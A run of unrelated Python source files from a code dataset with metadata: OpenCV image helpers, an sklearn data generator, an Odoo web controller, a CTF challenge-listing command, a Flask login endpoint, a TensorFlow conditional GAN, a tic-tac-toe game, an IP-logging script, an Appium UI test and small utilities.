ret, thresh = cv2.threshold(gray, 30, 255, cv2.THRESH_BINARY_INV)\n rows_index = np.nonzero(thresh)[0]\n cols_index = np.nonzero(thresh)[1] \n top,bottom = np.min(rows_index),np.max(rows_index)\n left,right = np.min(cols_index),np.max(cols_index)\n return (left,top),(right,bottom)\n # rec = cv2.rectangle(src,(left,top),(right,bottom),(255,0,0),2)\n # cv2.imshow(\"ff\",rec)\n # cv2.waitKey(3000)\n\ndef get_red_region(frame):\n # obtain user draw region -- default is blue\n img = frame\n hsv = cv2.cvtColor(src, cv2.COLOR_BGR2HSV)\n # need to modify\n low_blue = np.array([100,43,46])\n high_blue = np.array([124,255,255])\n mask = cv2.inRange(hsv,low_blue,high_blue)\n mask_inv = cv2.bitwise_not(mask)\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnt = contours[1]\n # print(\"cnt is: \",cnt,type(cnt),cnt.shape)\n left = cnt[0][0][0]\n top = cnt[0][0][1]\n right = cnt[2][0][0]\n bottom = cnt[4][0][1]\n # img = cv2.rectangle(img,(left,top),(right,bottom),(255,255,0),2)\n # cv2.drawContours(img,[cnt],0,(0,255,0),3)\n useful_frame_roi = img[top:bottom,left:right]\n cv2.imshow(\"contours\",useful_frame_roi)\n cv2.waitKey(3000)\n\ndef get_red_rect(frame,colored_frame):\n frame = np.uint8(frame)\n print(frame.dtype)\n ret,thresh=cv2.threshold(frame,200,255,cv2.THRESH_BINARY)\n contouts,h = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_NONE)\n cnt = contouts\n inner_x,inner_y,inner_w,inner_h = 999,999,999,999\n board = 30\n for i in cnt:\n #坐标赋值\n x,y,w,h = cv2.boundingRect(i)\n if w < inner_w and h < inner_h:\n inner_x,inner_y,inner_w,inner_h = x+board,y+board,w-2*board,h-2*board\n out = cv2.rectangle(colored_frame,(inner_x,inner_y),(inner_x+inner_w,inner_y+inner_h),(0,0,255),2)\n cv2.imshow('out',out)\n cv2.waitKey(0)\n\n\nif __name__ == \"__main__\":\n src = cv2.imread('picture.png')\n mask = cv2.imread(\"test.png\",0)\n get_red_rect(mask,src)\n # find_picture_location(src)\n\n \n","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"357044778","text":"import numbers\nimport numpy as np\n\nfrom sklearn.utils import check_array, check_random_state\nfrom sklearn.utils import shuffle as shuffle_\nfrom sklearn.utils.deprecation import deprecated\n\n\n@deprecated(\"Please import make_blobs directly from scikit-learn\")\ndef make_blobs(n_samples=100, n_features=2, centers=2, cluster_std=1.0,\n center_box=(-10.0, 10.0), shuffle=True, random_state=None):\n generator = check_random_state(random_state)\n\n if isinstance(centers, numbers.Integral):\n centers = generator.uniform(center_box[0], center_box[1],\n size=(centers, n_features))\n print(\"centers: \")\n print(centers)\n else:\n centers = check_array(centers)\n n_features = centers.shape[1]\n\n if isinstance(cluster_std, numbers.Real):\n cluster_std = np.ones(len(centers)) * cluster_std\n print(\"cluster_std: \")\n print(cluster_std)\n\n X = []\n y = []\n\n n_centers = centers.shape[0]\n if isinstance(n_samples, numbers.Integral):\n n_samples_per_center = [int(n_samples // n_centers)] * n_centers\n for i in range(n_samples % n_centers):\n n_samples_per_center[i] += 1\n print(\"n_samples_per_center: \")\n print(n_samples_per_center)\n else:\n n_samples_per_center = n_samples\n\n for i, (n, std) in enumerate(zip(n_samples_per_center, cluster_std)):\n X.append(centers[i] + generator.normal(scale=std,\n size=(n, n_features)))\n y += [i] * n\n\n X = np.concatenate(X)\n y = np.array(y)\n\n if shuffle:\n X, y = shuffle_(X, y, random_state=generator)\n\n return X, y\n\n\nX, y = make_blobs(centers=2, random_state=4, n_samples=30)\nprint(X)\nprint(y)","sub_path":"Chapter2/tuanhtran/testMakeBlobs.py","file_name":"testMakeBlobs.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"184146613","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2015 be-cloud.be\n# Jerome Sonnet \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport logging\n\nfrom openerp.addons.website.models.website import slug, unslug\n\nfrom openerp import http\nfrom openerp.http import request\nfrom openerp import tools\nfrom openerp.tools.translate import _\n\n_logger = logging.getLogger(__name__)\n\nclass website_portal_school_management(http.Controller):\n\n @http.route(['/program'], type='http', auth='public')\n def program(self, redirect=None, **post):\n programs = request.env['school.program'].sudo().search([('state', '=', 'published')],order=\"domain_id, cycle_id, name ASC\")\n program_list = []\n for program in programs:\n program_list.append({\n 'program' : program,\n 'slug_id' : slug(program),\n })\n values = {\n 'program_list': program_list,\n }\n return request.render(\"website_school_management.program\", values)\n \n @http.route(['/program/'], type='http', auth='public')\n def program_details(self, program_id, redirect=None, **post):\n _, program_id = unslug(program_id)\n program = request.registry['school.program'].browse(request.cr, request.uid, program_id, context=request.context)\n values = {\n 'program': program,\n 'slug_id' : program_id,\n }\n return request.render(\"website_school_management.program_details\", values)\n \n @http.route(['/print_program/'], type='http', auth='public')\n def print_program(self, program, redirect=None, **post):\n \n report_obj = request.registry['report']\n cr, uid, context = request.cr, request.uid, request.context\n reportname = 'school_management.report_program_details_content'\n \n pdf = report_obj.get_pdf(cr, uid, [program.id], reportname, data=None, context=None)\n pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', len(pdf))]\n return request.make_response(pdf, headers=pdfhttpheaders)","sub_path":"website_school_management/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"525352295","text":"# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# file: show.py\n# date: 2018-02-27\n# author: paul.dautry\n# purpose:\n#\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# =============================================================================\n# IMPORTS\n# =============================================================================\nfrom termcolor import colored\nfrom mkctf.helper.formatting import TAB\nfrom mkctf.helper.formatting import dict2str\n# =============================================================================\n# FUNCTIONS\n# =============================================================================\ndef __print_chall(logger, challenge, no_color):\n \"\"\"Prints a challenge\n\n Arguments:\n logger {Logger} -- [description]\n challenge {Challenge} -- [description]\n no_color {bool} -- [description]\n\n Returns:\n bool -- [description]\n \"\"\"\n conf = challenge.get_conf()\n if conf is None:\n logger.error(\"configuration missing. Run `mkctf configure \"\n \"-c {} -s {}`\".format(challenge.category(),\n challenge.slug()))\n return False\n\n static = ' [STANDALONE]' if conf['standalone'] else ''\n\n chall_entry = \"{t}{t}- {slug}{static}\".format(t=TAB,\n slug=challenge.slug(),\n static=static)\n if not no_color:\n color = 'green' if conf['enabled'] else 'red'\n chall_entry = colored(chall_entry, color, attrs=['bold'])\n del conf['enabled']\n\n del conf['standalone']\n del conf['category']\n del conf['slug']\n\n text = dict2str(conf).replace(\"\\n\", \"\\n{t}{t}{t}\".format(t=TAB))\n\n print(chall_entry)\n print(text[1:])\n\n return True\n\nasync def show(args, repo, logger):\n \"\"\"Shows a list of all challenges\n\n Arguments:\n args {Namespace} -- [description]\n repo {Repository} -- [description]\n logger {Logger} -- [description]\n\n Returns:\n [type] -- [description]\n \"\"\"\n found = False\n success = True\n results = {}\n category, slug = args.category, args.slug\n\n if not args.json:\n print(\"challenges:\")\n\n for cat, challenges in repo.scan(category):\n\n if not args.json:\n print(\"{}+ {}\".format(TAB, cat))\n\n results[cat] = {}\n\n for challenge in challenges:\n if slug is None or slug == challenge.slug():\n found = True\n try:\n if args.json:\n results[cat][challenge.slug()] = challenge.get_conf()\n elif not __print_chall(logger, challenge, args.no_color):\n success = False\n except Exception as e:\n logger.error(\"configuration is invalid (missing key: \"\n \"{}).\".format(e))\n success = False\n\n if not found:\n logger.warning(\"no challenge found matching given constraints.\")\n\n return results if args.json else success\n","sub_path":"mkctf/command/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"393297763","text":"# authentication class for API\n\nfrom flask_restful import Resource\nfrom flask_apispec import MethodResource, doc\nfrom flask import abort\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\nfrom .parsers import auth_post_parser\nfrom ...server.models import User\nfrom ...server.utils import Permission\n\n\n################\n#### view ####\n################\n\n@doc(description='authentication repository', tags=['auth'])\nclass AuthApi(MethodResource):\n '''default auth class to handle rest API calls '''\n def post(self):\n args = auth_post_parser.parse_args()\n try:\n user = User.query.filter_by(email=args['Username']).one()\n except NoResultFound:\n abort(404)\n except Exception:\n abort(500)\n\n if user:\n if user.verify_password(args['Password']):\n if user.can(Permission.VIEW_API):\n token = user.generate_confirmation_token()\n return {\"token\": token.decode('UTF-8')}\n else: abort(403)\n else:\n abort(401)\n else:\n abort(404)","sub_path":"project/server/api/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"243418175","text":"\"\"\"Posterior Inference with Conditional GAN\"\"\"\nimport os\nimport sys\nfrom arrows.config import floatX\nfrom tensorflow import Tensor\nimport tensorflow as tf\nfrom wacacore.train.common import (train_loop, updates, variable_summaries,\n setup_file_writers)\nfrom wacacore.util.io import handle_args\nfrom wacacore.util.generators import infinite_samples\nfrom wacacore.train.callbacks import every_n, summary_writes\nfrom wacacore.train.search import rand_local_hyper_search\nfrom typing import Generator, Callable, Sequence\nimport numpy as np\nfrom tflearn.layers import fully_connected\nfrom tflearn.layers.normalization import batch_normalization\n\n\ndef tf_cgan(x_prior: Tensor,\n x_prior_gen: Generator,\n z: Tensor,\n z_gen: Generator,\n f: Callable,\n g: Callable,\n disc: Callable,\n options):\n \"\"\"\n Train a conditional random variable using a generative adversarial network\n Args:\n prior: Prior\n prior_gen: Generator for the prior\n pcrv_inp: Poster Conditional Random Variable Inputs (placeholders)\n pcrv_inp: Poster Conditional Random Variable Outputs X\n discriminator: Tensor -> Tensor for discriminator function\n \"\"\"\n eps = 1e-6\n # 1. Attach the prior to its generator\n # Construct the two loss functiosns\n y = f(x_prior)\n x_fake = g(y, z)\n\n # Pipe the output of cgan into discriminator\n real = disc(x_prior, y, False) + eps\n # Pipe output of prior into discriminator\n fake = disc(x_fake, y, True) - eps\n\n a = -tf.log(real) - tf.log(1 - fake)\n loss_d = tf.reduce_mean(a)\n b = -tf.log(fake)\n loss_g = tf.reduce_mean(b)\n losses = [loss_d, loss_g]\n\n # Fetch\n fetch = {'losses': {'x_fake':x_fake[0:5],\n 'x_real':x_prior[0:5],\n 'loss_d':loss_d,\n 'loss_g':loss_g,\n 'fake':fake[0:5],\n 'real':real[0:5],\n 'd_pre_mean': a[0:5],\n 'g_pre_mean': b[0:5]}}\n # fetch['check'] = tf.add_check_numerics_ops()\n fetch['real'] = real[0]\n fetch['fake'] = fake[0]\n\n # 1st element from update is update tensor, 0th is optimizer\n # Make loss updates from losses\n g_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='generator')\n d_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,\n scope='discriminator')\n loss_updates = []\n loss_updates.append(updates(loss_d, d_vars, options)[1])\n loss_updates.append(updates(loss_g, g_vars, options)[1])\n\n # FIXME: Hyperparameterize this\n # loss_ratios = [1, 3]\n loss_ratios = None\n\n def generator():\n while True:\n yield {x_prior: next(x_prior_gen),\n z: next(z_gen)}\n\n train_generators = [generator()]\n\n\n # Init\n sess = tf.Session()\n init = tf.initialize_all_variables()\n sess.run(init)\n\n # Reconstruction loss\n y_recon = f(x_fake)\n recon_loss = tf.reduce_mean(tf.abs(y_recon - y))\n fetch['recon_loss'] = recon_loss\n\n # Summaries\n summaries = variable_summaries({'gen_loss': loss_g,\n 'disc_loss': loss_d,\n 'recon_loss': recon_loss})\n\n ss = tf.summary.histogram(\"y_recon\", y_recon)\n fetch['summaries'] = summaries\n writers = setup_file_writers('summaries', sess)\n options['writers'] = writers\n callbacks = [every_n(summary_writes, 25)]\n\n train_loop(sess,\n loss_updates=loss_updates,\n fetch=fetch,\n train_generators=train_generators,\n test_generators=None,\n loss_ratios=loss_ratios,\n test_every=100,\n callbacks=callbacks,\n **options)\n\n\ndef run(options):\n \"\"\"Simple Example\"\"\"\n # x, y sampled from normal distribution\n batch_size = options['batch_size']\n x_len = 1\n # x_prior_gen = infinite_samples(lambda *shape: np.random.exponential(size=shape),\n # shape=(x_len,),\n # batch_size=batch_size,\n # add_batch=True)\n x_prior_gen = infinite_samples(lambda *shape: np.ones(shape=shape) * 0.5,\n shape=(x_len,),\n batch_size=batch_size,\n add_batch=True)\n\n x_prior = tf.placeholder(dtype=floatX(), shape=(batch_size, x_len))\n\n def f(x):\n \"\"\"The model\"\"\"\n # return tf.reduce_sum(x, axis=1)\n return x\n\n z_len = 1\n z = tf.placeholder(dtype=floatX(), shape=(batch_size, z_len))\n # z_gen = infinite_samples(np.random.rand,\n # shape=(z_len,),\n # batch_size=batch_size,\n # add_batch=True)\n z_gen = infinite_samples(lambda *shape: np.ones(shape=shape) * 0.5,\n shape=(z_len,),\n batch_size=batch_size,\n add_batch=True)\n\n\n def g(y, z):\n \"\"\"Generator\"\"\"\n with tf.name_scope(\"generator\"):\n with tf.variable_scope(\"generator\"):\n # y = tf.expand_dims(y, 1)\n # inp = tf.concat([y, z], axis=1)\n inp = y\n inp = fully_connected(inp, 10, activation='elu')\n # inp = batch_normalization(inp)\n inp = fully_connected(inp, 10, activation='elu')\n # inp = batch_normalization(inp)\n inp = fully_connected(inp, x_len, activation='elu')\n # inp = batch_normalization(inp)\n return inp\n\n def g_pi(y, z):\n \"\"\"Parametric Inverse Generator\"\"\"\n with tf.name_scope(\"generator\"):\n with tf.variable_scope(\"generator\"):\n theta_len = 1\n # the neural network will take as input z, and output\n # the two parameters for\n inp = z\n inp = fully_connected(inp, 20, activation='elu')\n inp = batch_normalization(inp)\n inp = fully_connected(inp, 20, activation='elu')\n inp = batch_normalization(inp)\n theta = fully_connected(inp, theta_len, activation='elu')\n theta = batch_normalization(theta)\n x_1 = tf.expand_dims(y, 1) - theta\n x_2 = theta\n x = tf.concat([x_1, x_2], 1)\n return x\n\n def disc(x, y, reuse, use_y=False):\n \"\"\"Discriminator\"\"\"\n with tf.name_scope(\"discriminator\"):\n with tf.variable_scope(\"discriminator\", reuse=reuse):\n if use_y:\n inp = tf.concat([x, tf.expand_dims(y, 1)], 1)\n else:\n inp = x\n # import pdb; pdb.set_trace()\n # inp = fully_connected(inp, 3, activation='elu')\n out = fully_connected(inp, 1, activation='sigmoid')\n return out\n\n tf_cgan(x_prior,\n x_prior_gen,\n z,\n z_gen,\n f,\n g,\n disc,\n options)\n\n\ndef hyper_search():\n \"\"\"Do hyper parameter search for cgan\"\"\"\n options = {'update': 'adam',\n 'train': True,\n 'save': True,\n 'num_iterations': 10,\n 'save_every': 1000,\n 'learning_rate': 0.001,\n 'batch_size': [64, 128],\n 'datadir': os.path.join(os.environ['DATADIR'], \"rf\")}\n var_option_keys = ['batch_size']\n file_Path = os.path.abspath(__file__)\n rand_local_hyper_search(options, file_Path, var_option_keys, nsamples=2,\n prefix='cgan', nrepeats=1)\n\n\ndef default_options():\n \"Get default options for pdt training\"\n options = {}\n options['num_iterations'] = (int, 100)\n options['save_every'] = (int, 100)\n options['batch_size'] = (int, 512)\n options['gpu'] = (bool, False)\n options['dirname'] = (str, \"dirname\")\n options['datadir'] = (str, os.path.join(os.environ['DATADIR'], \"rf\"))\n return options\n\n\ndef main():\n if \"--hyper\" in sys.argv:\n hyper_search()\n else:\n cust_opts = default_options()\n options = handle_args(sys.argv[1:], cust_opts)\n if options['gpu']:\n print(\"Using GPU\")\n run(options)\n else:\n print(\"Using CPU\")\n with tf.device('/cpu:0'):\n run(options)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# TODO\n# Hyper parameterize the neural network architectures\n# Do hyperparameter search on openmind\n# So what it should be is that I add the tag --hyper_search\n","sub_path":"reverseflow/prob/cgan.py","file_name":"cgan.py","file_ext":"py","file_size_in_byte":8175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"306320119","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport argparse\nimport cv2\nimport numpy as np\n\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\nif sys.stdin.isatty():\n parser.add_argument(\"img_path\", type=str)\nparser.add_argument(\"kernel\", type=int)\ngroup.add_argument(\"--append_dst\", type=str)\ngroup.add_argument(\"--normal_dst\", type=str)\nparser.add_argument(\"--cmd\", help=\"optional\", action=\"store_false\")\nparser.add_argument(\"--kernelX\", type=int)\nparser.add_argument(\"--kernelY\", type=int)\n\nargs = parser.parse_args()\nif hasattr(args, 'img_path'):\n img_path = args.img_path\nelse:\n img_path = sys.stdin.readline()[:-1]\n\nkernelX = kernelY = args.kernel\nkernelX = args.kernelX if args.kernelX else kernelX\nkernelY = args.kernelY if args.kernelY else kernelY\n\ncmd = bool(args.cmd)\nif args.normal_dst:\n dst_path = args.normal_dst\nelse:\n dst_name = os.path.basename(img_path)\n dst_folder = args.append_dst\n namelist = dst_name.split(\".\")\n dst_name = f'{\".\".join(namelist[0:-1])}-E({kernelX},{kernelY}).{namelist[-1]}'\n dst_path = dst_folder + dst_name\n\n\ndef stdout(msg, isinfo=True):\n if (cmd or isinfo) and not (cmd and isinfo):\n pass\n else:\n print(msg)\n\n\ndef main():\n kernel_in = (kernelX,kernelY)\n stdout(f'kernel:{kernel_in}\\n---start---')\n img = cv2.imread(img_path)\n stdout(f'{img_path} is loaded')\n kernel = np.ones(kernel_in, np.uint8)\n dst = cv2.erode(img, kernel, iterations=1)\n stdout('filter done')\n cv2.imwrite(dst_path, dst)\n stdout(f'output to {dst_path}')\n stdout('---end---')\n stdout(dst_path, False)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Erosion.py","file_name":"Erosion.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"299951222","text":"def display_board(board):\n\t\n\tprint( \" \" + board[1] + \" | \" + board[2] + \" | \" + board[3])\n\tprint( \"----------\")\n\tprint( \" \" + board[4] + \" | \" + board[5] + \" | \" + board[6])\n\tprint( \"----------\")\n\tprint( \" \" + board[7] + \" | \" + board[8] + \" | \" + board[9])\n\ndef player_input():\n\n\twhile True:\n\t\n\t\ta= raw_input(\"player 1: choose your symbol [x/o] : \")\n\t\n\t\tst=['x','o']\n\t\tglobal p1\n\t\tglobal p2\n\t\tp1=''\n\t\tp2=''\n\t\tif a == 'x':\n\t\t\tp1=p1+a\n\t\t\tp2=p2+st[1]\n\t\t\tprint(\"player 1 is : {}\" .format(p1))\n\t\t\tprint(\"player 2 is : {}\" .format(p2))\n\t\t\tbreak\n\t\telif a == 'o':\n\t\t\tp1=p1+a\n\t\t\tp2=p2+st[0]\n\t\t\tprint(\"player 1 is : {}\" .format(p1))\n\t\t\tprint(\"player 2 is : {}\" .format(p2))\n\t\t\tbreak\n\t\t\n\t\telse:\n\t\t\tprint(\"wrong input!! choose between 2 symbols [x/o]! \")\n\t\t\tcontinue\n\n\t\t\ndef players(board):\n\tprint(\"iam from player function:\")\n\n\n\twhile True:\n\n\t\twhile True:\n\t\n\t\t\tpla1=int(input(\"player 1: enter yur choice of position : \"))\n\n\t\t\tif board[pla1]=='':\n\t\t\t\tboard[pla1]=p1\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"entered position is occupied!!\")\n\t\t\t\tprint(\"choose someother position other than {} \".format(pla1))\n\t\t\t\tcontinue\n\t\tdisplay_board(board)\n\n\t\tif board[1]=='x' and board[2]=='x' and board[3]=='x':\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[4]=='x' and board[5]=='x' and board[6]=='x':\n\t\t\tprint(board[4] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[7]=='x' and board[8]=='x' and board[9]=='x':\n\t\t\tprint(board[7] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='x' and board[4]=='x' and board[7]=='x' :\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[2]=='x' and board[5]=='x' and board[8]=='x':\n\t\t\tprint(board[2] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[3]=='x' and board[6]=='x' and board[9]=='x':\n\t\t\tprint(board[3] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='x' and board[5]=='x' and board[9]=='x' :\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[3]=='x' and board[5]== 'x' and board[7]=='x':\n\t\t\tprint(board[3] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='o' and board[2]=='o' and board[3]=='o':\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[4]=='o' and board[5]=='o' and board[6]=='o':\n\t\t\tprint(board[4] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[7]=='o' and board[8]=='o' and board[9]=='o':\n\t\t\tprint(board[7] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='o' and board[4]=='o' and board[7]=='o' :\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[2]=='o' and board[5]=='o' and board[8]=='o':\n\t\t\tprint(board[2] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[3]=='o' and board[6]=='o' and board[9]=='o':\n\t\t\tprint(board[3] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[1]=='o' and board[5]=='o' and board[9]=='o' :\n\t\t\tprint(board[1] ,\"wins !!\")\n\t\t\tbreak\n\t\tif board[3]=='o' and board[5]== 'o' and board[7]=='o':\n\t\t\tprint(board[3] ,\"wins !!\")\n\t\t\tbreak\n\n\t\twhile True:\n\t\n\t\t\tpla2=int(input(\"player 2: enter yur choice of position : \"))\n\n\t\t\tif board[pla2]=='':\n\t\t\t\tboard[pla2]=p2\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"entered position is occupied!!\")\n\t\t\t\tprint(\"choose someother position other than {} \".format(pla2))\n\t\t\t\tcontinue\n\t\tdisplay_board(board)\n\t\tcontinue\n\nprint(\"Welcome to the Tic Tac Toe game!!! \\n\")\nboard=['#','','','','','','','','','','']\n\ndisplay_board(board)\nplayer_input()\nplayers(board)\n\n\n\n\n\n\n\n\n\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"409332132","text":"import requests\n\nu = requests.get('http://jsonplaceholder.typicode.com/users')\n\n\ndef pars(email):\n\n uj = u.json()\n resultStr = '' \n for i in uj: \n if email.lower() == i['email'].lower():\n for j in i:\n resultStr = '{} \\n {}'.format(resultStr, i[j])\n return resultStr;","sub_path":"testSite/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596578793","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n# __author__ = \"10291\"\n# 读取IP地址并保存到txt文件中\n\nimport os\nimport subprocess\nimport requests\nimport re\nimport time\nimport xgboost as xgb\n\n\ndef text_create(name, msg):\n desktop_path = \"C:\\\\Users\\\\10291\\\\OneDrive\\\\\" # 新创建的txt文件的存放路径\n full_path = desktop_path + name + '.txt' # 也可以创建一个.doc的word文档\n file = open(full_path, 'a')\n file.write(msg + \"\\n\")\n file.close()\n\n\ndef clear_txt():\n file = open(\"C:\\\\Users\\\\10291\\\\OneDrive\\\\dd.txt\", 'w')\n file.write('')\n file.close()\n\n\na = 0\nclear_txt()\nwhile True:\n a = a + 1\n text = requests.get('http://txt.go.sohu.com/ip/soip').text\n ip = re.findall(r'\\d+.\\d+.\\d+.\\d+', text)\n ip = ip[0]\n sysTime = time.strftime('%H:%M:%S', time.localtime(time.time()))\n print(sysTime)\n print(ip)\n text_create('dd', \"# \" + sysTime + \"\\n \" + ip)\n print(a)\n time.sleep(600*3)\n","sub_path":"cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"309482352","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0006_auto_20151019_0144'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='item',\n name='sex',\n field=models.SmallIntegerField(blank=True, null=True, verbose_name='Sex', choices=[(1, b'Male'), (2, b'Female')]),\n ),\n ]\n","sub_path":"apps/main/migrations/0007_item_sex.py","file_name":"0007_item_sex.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"556292398","text":"#!/usr/bin/env python\n#encoding: utf-8\n\n\n\nimport time\nimport sys\nimport unittest\nimport traceback\nimport os\n\n\n\nsys.path.append('/jiaoben_z/initialization')\nsys.path.append('/jiaoben_z/Common/Test_Login')\n\nimport initialization\nfrom Common.Test_Login import User_Login\n\n\n\n\n\n\nclass TG_Banner(unittest.TestCase):\n def __init__(self, methodName):\n unittest.TestCase.__init__(self, methodName)\n print('************************** start test **************************')\n\n # 初始化操作\n\n def setUp(self):\n initialization.setUp(self)\n\n # 测试用例执行完成后的操作\n\n def tearDown(self):\n initialization.tearDown(self)\n\n\n\n def banner_jump(self):\n\n try:\n User_Login(self)\n time.sleep(3)\n\n self.driver.find_element_by_id('android:id/button1').click()\n time.sleep(1)\n self.driver.find_element_by_id('android:id/button1').click()\n time.sleep(2)\n\n # 多级目录截图\n foldname1 = time.strftime('%Y-%m-%d')\n\n dirname = os.path.join('/Users/zhulx/Documents/jiaoben_z/picture', foldname1)\n print(dirname)\n\n dirname2 = os.path.join(dirname, 'Test_banner')\n print(dirname2)\n\n if not os.path.exists(dirname):\n os.mkdir(dirname)\n\n if not os.path.exists(dirname2):\n os.mkdir(dirname2)\n\n\n else:\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n\n\n\n # 媒资首页banner跳转\n\n\n for i in range(5):\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n self.driver.find_element_by_id('com.modernsky.istv:id/banner').click()\n time.sleep(3)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n print('************ 跳转媒资首页banner详情 **************')\n self.driver.press_keycode(4)\n time.sleep(3)\n self.driver.swipe(824,424,156,612)\n time.sleep(3)\n\n # 票务首页banner跳转\n self.driver.find_element_by_id('com.modernsky.istv:id/mShop').click()\n print('*********** 跳转票务首页 *************')\n time.sleep(2)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n for i in range(8):\n self.driver.find_element_by_id('com.modernsky.istv:id/banner').click()\n time.sleep(2)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n print('************ 跳转票务首页banner详情 **************')\n self.driver.press_keycode(4)\n time.sleep(3)\n self.driver.swipe(824, 424, 156, 612)\n time.sleep(3)\n\n #商城首页banner跳转\n self.driver.tap([(306, 98), (426, 159)])\n print('*********** 跳转商城首页 *************')\n time.sleep(2)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n for i in range(8):\n self.driver.find_element_by_id('com.modernsky.istv:id/banner').click()\n time.sleep(2)\n self.driver.get_screenshot_as_file(dirname2 + '/' + time.strftime('%H:%M:%S') + '.png')\n print('************ 跳转商城首页banner详情 **************')\n self.driver.press_keycode(4)\n time.sleep(3)\n self.driver.swipe(824, 424, 156, 612)\n time.sleep(3)\n\n\n\n\n\n\n\n\n\n except Exception as err:\n traceback.print_exc()\n print(err)\n print(\"*******异常********\")\n","sub_path":"TestCase/Test_banner.py","file_name":"Test_banner.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"424943046","text":"answers = {'hello': \"Hi!\", 'how are you': 'Fine', 'bye': 'See you'}\n\ndef get_answer(question):\n return answers.get(question.lower(), 'Question is not found.')\n\n\ndef main():\n while True:\n question = input ('Enter question: ')\n if question.lower() != 'exit':\n print(get_answer(question))\n else:\n break\n\n\nif __name__ == '__main__':\n 